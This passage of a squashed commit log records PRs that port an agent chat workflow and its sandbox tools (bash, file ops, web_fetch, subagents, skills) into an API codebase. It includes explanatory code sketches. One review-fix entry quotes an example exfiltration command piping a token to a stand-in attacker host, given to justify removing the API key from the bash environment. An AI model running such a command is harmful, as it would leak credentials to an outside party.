Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)
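
The curation rule above amounts to an allow-list over the parent's tool record. A sketch, assuming the tool keys match the names in the commit text (the real registry keys may differ) and using a generic tool type so it runs without the AI SDK:

```typescript
// Allow-list from the commit message; the key names are assumed.
const SUBAGENT_TOOL_NAMES = ["read", "write", "edit", "grep", "glob", "bash"] as const;

/** Pick only the allow-listed tools, so task, skill and friends never reach a subagent. */
function buildSubagentTools<T>(allTools: Record<string, T>): Record<string, T> {
  const subset: Record<string, T> = {};
  for (const name of SUBAGENT_TOOL_NAMES) {
    const tool = allTools[name];
    if (tool !== undefined) subset[name] = tool;
  }
  return subset;
}
```

An allow-list is the safer default here: a tool added to the parent later stays out of the subagent set until someone opts it in.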

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.
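
The split between the durable (serializable) context and the hydrated context can be sketched roughly as below. This is an illustration only: `LanguageModelStub`, `AgentContextSketch`, `hydrateContext`, and the single-argument `getSubagentModelSketch` are hypothetical stand-ins, not the real AI SDK types or the helpers in this commit.

```typescript
// Stand-in for the AI SDK's LanguageModel so the sketch compiles on its own.
type LanguageModelStub = { modelId: string };

// Assumed minimal shape; the real AgentContext carries more fields.
interface AgentContextSketch {
  workingDirectory: string;
  model: LanguageModelStub;
  subagentModel?: LanguageModelStub;
}

// Only the JSON-serializable part travels through the durable workflow input.
type DurableAgentContextSketch = Omit<AgentContextSketch, "model" | "subagentModel">;

// Inside the step, a freshly constructed model is merged back in.
function hydrateContext(
  durable: DurableAgentContextSketch,
  model: LanguageModelStub,
): AgentContextSketch {
  return { ...durable, model };
}

// The subagent falls back to the parent's model when no override is set.
function getSubagentModelSketch(ctx: AgentContextSketch): LanguageModelStub {
  return ctx.subagentModel ?? ctx.model;
}
```

Keeping the model out of the durable type means a non-serializable object cannot be passed as workflow input without a type error.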

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop
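
A minimal sketch of the `org-<slug>-<uuid>` → uuid mapping, assuming the UUID is the trailing segment of the repository name. The regex, the optional `.git` suffix handling, the `null` return on no match, and the sample UUID in the usage note are assumptions for illustration, not the actual extractOrgId implementation.

```typescript
// Hypothetical pattern: `org-`, a slug, then a canonical 8-4-4-4-12 UUID at the end.
const ORG_UUID_PATTERN =
  /org-.+-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})(?:\.git)?\/?$/i;

function extractOrgIdSketch(cloneUrl: string | null | undefined): string | null {
  if (!cloneUrl) return null;
  const match = ORG_UUID_PATTERN.exec(cloneUrl);
  // Lowercase so the id compares equal regardless of how the URL was cased.
  return match?.[1]?.toLowerCase() ?? null;
}
```

For example, a made-up URL ending in `org-demo-slug-1B2C3D4E-0000-4000-8000-ABCDEF012345` would yield the lowercased UUID, and a URL without the `org-` shape would yield `null`.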

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 CAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.
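
The CAS-before-start ordering can be illustrated with an in-memory stand-in for the chats table. Everything here is a hypothetical sketch (`activeStreamIds`, `compareAndSet`, `handleRequestSketch`, and the `startWorkflow` callback are invented for the example); the real handler works against Supabase and the workflow runtime.

```typescript
// In-memory stand-in for chats.active_stream_id, keyed by chat id.
const activeStreamIds = new Map<string, string | null>();

// Compare-and-set: write `next` only if the current value equals `expected`.
function compareAndSet(chatId: string, expected: string | null, next: string | null): boolean {
  const current = activeStreamIds.get(chatId) ?? null;
  if (current !== expected) return false; // race lost, nothing written
  activeStreamIds.set(chatId, next);
  return true;
}

type StartResult = { status: 200; runId: string } | { status: 409 };

function handleRequestSketch(
  chatId: string,
  placeholder: string,
  startWorkflow: () => string,
): StartResult {
  // 1. Claim the slot with a placeholder BEFORE starting anything billable.
  if (!compareAndSet(chatId, null, placeholder)) return { status: 409 };
  // 2. Only the request that won the claim starts the workflow.
  const runId = startWorkflow();
  // 3. Promote the placeholder to the real run id.
  compareAndSet(chatId, placeholder, runId);
  return { status: 200, runId };
}
```

Because the claim happens first, a second request for the same chat is rejected without ever calling `startWorkflow`.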

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.
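
The title truncation fix amounts to reserving room for the suffix before slicing. A rough sketch, assuming a limit of 80 (taken from the "title-from-first-80" note above) and a hypothetical `truncateTitle` helper name:

```typescript
const TITLE_MAX_LENGTH = 80; // assumed value
const ELLIPSIS = "…"; // a single character, unlike "..."

function truncateTitle(text: string, max: number = TITLE_MAX_LENGTH): string {
  const trimmed = text.trim();
  if (trimmed.length <= max) return trimmed;
  // Body budget = max - suffix length, so the result is exactly `max` long.
  const bodyBudget = max - ELLIPSIS.length;
  return trimmed.slice(0, bodyBudget) + ELLIPSIS;
}
```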

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.
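
One way to picture the generic `where` predicate is as a map that is split into equality matches and `IS NULL` checks before it reaches the query builder. The sketch below is an assumption about the approach, with hypothetical names (`WhereSketch`, `splitWhere`); it does not call the Supabase client.

```typescript
type WhereValue = string | number | boolean | null;
type WhereSketch = Record<string, WhereValue>;

function splitWhere(where: WhereSketch): {
  equals: Record<string, string | number | boolean>;
  nulls: string[];
} {
  const equals: Record<string, string | number | boolean> = {};
  const nulls: string[] = [];
  for (const [column, value] of Object.entries(where)) {
    if (value === null) {
      nulls.push(column); // would become `column IS NULL`
    } else {
      equals[column] = value; // would become `column = value`
    }
  }
  return { equals, nulls };
}
```

A compare-and-set on `active_stream_id` then becomes an ordinary `where` entry (for example `{ id: "chat-1", active_stream_id: null }`), so no column name is hardcoded in the generic helper.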

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both fixes are behavior-neutral: the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.
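
The `in`-operator narrowing from fix 1 can be sketched as follows. The result shapes follow the commit text (`{ok, rowsUpdated}` and `{ok, claimed}`); the `string` error type and the `toClaimResult` name are assumptions for the example.

```typescript
type UpdateResult = { ok: true; rowsUpdated: number } | { ok: false; error: string };
type ClaimResult = { ok: true; claimed: boolean } | { ok: false; error: string };

function toClaimResult(result: UpdateResult): ClaimResult {
  // `"error" in result` selects the failure member by property presence,
  // so it does not depend on the literal type of `ok` being preserved.
  if ("error" in result) return { ok: false, error: result.error };
  // Zero rows updated means another request won the race.
  return { ok: true, claimed: result.rowsUpdated > 0 };
}
```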

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.
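
A tightened guard along the lines described in the P2 item might look like this. The `AgentContextGuardSketch` shape is an assumed minimum (the real AgentContext has more fields), and the function name is hypothetical.

```typescript
interface AgentContextGuardSketch {
  sandbox: { state: object; workingDirectory: string };
}

function isAgentContextSketch(value: unknown): value is AgentContextGuardSketch {
  if (typeof value !== "object" || value === null) return false;
  const sandbox = (value as { sandbox?: unknown }).sandbox;
  if (typeof sandbox !== "object" || sandbox === null) return false;
  const { state, workingDirectory } = sandbox as {
    state?: unknown;
    workingDirectory?: unknown;
  };
  // Require a non-null state object AND a non-empty working directory.
  return (
    typeof state === "object" &&
    state !== null &&
    typeof workingDirectory === "string" &&
    workingDirectory.length > 0
  );
}
```

With this shape check, `{ sandbox: {} }` is rejected at the guard instead of failing later inside a tool.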

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB
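
As an illustration of the 1-indexed offset/limit behavior noted for readFileTool, a formatter could look roughly like this. The `N: line` output format, the default limit, and the `formatNumberedLines` name are assumptions, not the ported tool's actual output.

```typescript
function formatNumberedLines(content: string, offset = 1, limit = 2000): string {
  const lines = content.split("\n");
  const start = Math.max(1, offset); // offsets are 1-indexed
  return lines
    .slice(start - 1, start - 1 + limit)
    .map((line, index) => `${start + index}: ${line}`)
    .join("\n");
}
```

The line numbers shown to the model stay tied to the file, not to the returned slice, so a follow-up read or edit can reference them directly.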

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path
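
The quote-escaping trick behind shellEscape is the standard POSIX one: close the single-quoted string, emit an escaped quote, and reopen it. A minimal sketch, assuming the helper also wraps the whole value in single quotes (the real helper may differ):

```typescript
function shellEscapeSketch(value: string): string {
  // Each ' becomes '\'' (close quote, escaped quote, reopen quote).
  return "'" + value.replace(/'/g, "'\\''") + "'";
}
```

Inside single quotes the shell performs no expansion, so the result is safe to interpolate into a command string as one argument.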

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting
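
A hand-rolled frontmatter parser for the YAML subset described above (key:value, quoted strings, booleans, colons preserved in URLs) could be sketched as below. This is an illustrative reimplementation with a hypothetical name, not the code in parseSkillFrontmatter.ts.

```typescript
type FrontmatterValue = string | boolean;

function parseFrontmatterSketch(markdown: string): Record<string, FrontmatterValue> {
  const result: Record<string, FrontmatterValue> = {};
  const match = /^---\r?\n([\s\S]*?)\r?\n---/.exec(markdown);
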